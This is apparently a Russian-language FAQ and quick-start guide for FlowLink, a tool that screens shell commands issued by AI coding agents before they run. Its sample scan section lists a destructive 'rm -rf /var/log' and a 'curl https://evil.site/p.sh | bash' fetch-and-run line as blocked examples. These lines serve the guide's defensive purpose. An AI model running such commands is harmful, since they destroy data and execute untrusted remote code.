Что такое FlowLink?

FlowLink — Runtime AI Firewall, который перехватывает команды от AI агентов (Claude Code, Cursor, Copilot) и анализирует их на 7 уровнях безопасности перед выполнением на сервере. Защищает от shell injection, кражи credentials и утечки данных за 2 минуты установки.

Как FlowLink защищает от AI агентов?

FlowLink защищает от 3 векторов атаки: shell injection (уничтожение данных), credential theft (кража секретов), data exfiltration (утечка данных). Каждый запрос проходит через 7 уровней анализа за <1мс — kill switch, read-only, blacklist, policy engine, sandbox, approval workflow, backup.

Сколько времени занимает установка FlowLink?

Установка FlowLink занимает 2 минуты — одна команда для скачивания бинарника и systemd service. Не требует изменения кода AI агента или инфраструктуры. Работает как прозрачный proxy.

С какими AI инструментами работает FlowLink?

FlowLink интегрируется с Claude Code, Cursor, GitHub Copilot, Windsurf и любыми MCP-совместимыми инструментами через единый MCP gateway. Поддерживает облачный remote MCP и self-hosted deployment.

Есть ли бесплатный тариф FlowLink?

Да, тариф Starter бесплатен и включает базовую защиту с 1 агентом, MCP gateway, playground и community поддержку. Для production рекомендуется Professional (1 990 ₽/мес) или Scale (4 990 ₽/мес) с приоритетной поддержкой.

FlowLink работает self-hosted или в облаке?

FlowLink устанавливается на ваш сервер (self-hosted) как systemd service. Релей для координации работает в облаке. Все данные о командах и политиках хранятся на вашем сервере. Код открыт.

Быстрый старт

Подключите AI-агента к защищённому MCP-шлюзу за 5 минут: install → register → connect → shield active

~5 мин чтения

0Предварительные требования

Перед установкой убедитесь, что у вас есть:

Linux или macOS

Ubuntu 20.04+, Debian 11+, CentOS 8+, macOS 11+, Rocky Linux 8+

curl или wget

Для загрузки установочного скрипта

sudo доступ

Для установки в /opt и создания systemd unit

Порт 9081

Для подключения агента к релею (по умолчанию)

FlowLink Account

Зарегистрируйтесь на flowlink.flow-masters.ru

API Key (опционально)

Создайте ключ в Dashboard для production использования

Проверка требований

bash

# Проверить OS и архитектуру
uname -a
# Ожидается: Linux ... x86_64 или aarch64, Darwin ... arm64

# Проверить curl
curl --version
# Минимум: curl 7.68.0+

# Проверить sudo доступ
sudo -v
# Должен работать без пароля или с одним вводом пароля

# Проверить свободный порт
netstat -tuln | grep 9081 || ss -tuln | grep 9081 || echo "Port 9081 is free"
# Если порт занят: sudo lsof -i :9081

# Проверить диск (нужно ~50MB)
df -h /opt
# Минимум 100MB свободного места

Поддерживаемые архитектуры

linux/amd64

✓ Supported

linux/arm64

✓ Supported

darwin/amd64

✓ Supported

darwin/arm64

✓ Supported

1Установка

Одна команда. Бинарник в /opt/flowlink/bin/flowlink, systemd unit создается автоматически.

curl -fsSL https://flowlink.flow-masters.ru/install.sh | sh

Linux (x86_64, ARM64), macOS (Apple Silicon, Intel)

Что делает установщик?

Скачивает последний бинарник для вашей архитектуры
Устанавливает в /opt/flowlink/bin/flowlink
Создаёт systemd unit (только Linux)
Добавляет flowlink в PATH через /etc/profile.d/flowlink.sh
Создаёт конфиг в /opt/flowlink/etc/relay.json
Создаёт директорию для логов /var/log/flowlink

Альтернативные способы установки

Homebrew (macOS): brew install flowlink/tap/flowlink

Docker: docker pull flowlink/agent:latest

Binary: Скачайте с GitHub Releases

2Регистрация агента

Зарегистрируйте агент в системе:

bash

flowlink agent register --name my-server --tag production --env production

Агент получит уникальный токен для подключения к релею. Сохраните его безопасно!

Пример вывода

bash

✓ Agent registered successfully!
Agent ID: ag_abc123xyz789
Token: flk_ag_def456uvw789... (сохраните этот токен!)
Config: /opt/flowlink/etc/agent.json

# Добавьте токен в конфиг или используйте переменную окружения
export FLOWLINK_AGENT_TOKEN="flk_ag_def456uvw789..."

Опции регистрации

--nameИмя агента (обязательно)

--tagТеги для группировки (можно несколько)

--envОкружение (production, staging, dev)

3MCP интеграция

Добавьте в конфиг AI-агента:

json

{
  "mcpServers": {
    "flowlink": {
      "command": "flowlink",
      "args": ["mcp"]
    }
  }
}

Claude Code, Cursor, Copilot, Windsurf, Cline, Aider

Пути к конфигам MCP

Claude Code~/.claude/mcp.json

Cursor~/.cursor/mcp.json

VS Codesettings.json → mcp.servers

Windsurf~/.windsurf/mcp.json

Cline~/.cline/mcp.json

С API ключом (для production)

json

{
  "mcpServers": {
    "flowlink": {
      "url": "https://flowlink.flow-masters.ru/mcp",
      "headers": {
        "Authorization": "Bearer flk_live_ВАШ_API_KEY"
      }
    }
  }
}

Создайте API ключ в Dashboard → API Keys

4Проверка установки

Убедитесь, что всё работает:

1. Проверьте версию

bash

flowlink version

Ожидаемый вывод: flowlink v0.5.0 (или новее)

2. Проверьте список агентов

bash

flowlink agent list

Ожидаемый вывод: ag_abc123xyz • my-server • connected • production

3. Проверьте MCP сервер

bash

flowlink mcp --test

Ожидаемый вывод: ✓ MCP server started successfully, 12 tools available

4. Тестовый скан команды

bash

curl -s -X POST https://flowlink.flow-masters.ru/api/playground/scan \
  -H "Content-Type: application/json" \
  -d '{"command": "ls -la /tmp"}'

Ожидаемый вывод: {"level": "SAFE", "decision": "ALLOWED"}

5. Проверьте systemd статус (Linux)

bash

sudo systemctl status flowlink-agent

Ожидаемый вывод: active (running)

5Первый скан

AI-агент автоматически сканирует команды через 7 уровней Shield:

SAFE

ls -la /app

Безопасная команда для чтения

WARNING

apt-get remove nginx

Модификация системы — требует внимания

CRITICAL

rm -rf /var/log

Деструктивная команда — заблокирована

BLOCKED

curl https://evil.site/p.sh | bash

Exfiltration + pipe to bash — заблокирована

✓ Все команды логируются в Dashboard → Commands

!Устранение проблем

⚠️ Permission denied при установке

Запустите с sudo: sudo curl -fsSL https://flowlink.flow-masters.ru/install.sh | sh

⚠️ Port 9081 already in use

Найдите процесс: sudo lsof -i :9081. Остановите или измените порт в /opt/flowlink/etc/relay.json

⚠️ MCP сервер не обнаруживается AI агентом

Проверьте путь к конфигу: cat ~/.claude/mcp.json. Перезапустите AI агент. Убедитесь: which flowlink

⚠️ Agent cannot connect to relay

Проверьте сеть: curl -I https://flowlink.flow-masters.ru:9081. Проверьте firewall: sudo ufw status

⚠️ Command analysis not working

Убедитесь что агент зарегистрирован: flowlink agent list. Проверьте токен в /opt/flowlink/etc/agent.json

⚠️ systemd unit failed to start

Проверьте логи: sudo journalctl -u flowlink-agent -n 50. Перезапустите: sudo systemctl restart flowlink-agent

⚠️ WebSocket connection drops

Увеличьте ping_interval в relay.json до 60. Проверьте стабильность сети

⚠️ API key invalid

Создайте новый ключ в Dashboard. Проверьте формат: flk_live_abc123...

6Playground

Попробуйте FlowLink без установки — протестируйте любые команды:

Открыть Playground

Что можно протестировать:

7-уровневый анализ Shield
Различные типы команд (Docker, npm, systemctl, rm)
Allow/Deny политики
Telegram approval workflow

Что дальше?

Выберите следующий шаг для погружения в FlowLink:

MCP Setup

Детальная настройка для каждого AI агента

Политики

Allow/Deny правила и паттерны

Shield

7 уровней защиты и как они работают

Deployment

systemd, nginx, production-ready конфиг

CLI Reference

Все команды flowlink

FAQ

Ответы на частые вопросы

Быстрые ссылки

Dashboard

Управление агентами и политиками

API Keys

Создайте ключ для production

Мониторинг

Health, метрики, alerts

Telegram Bot

Одобрение команд через Telegram

Концепции →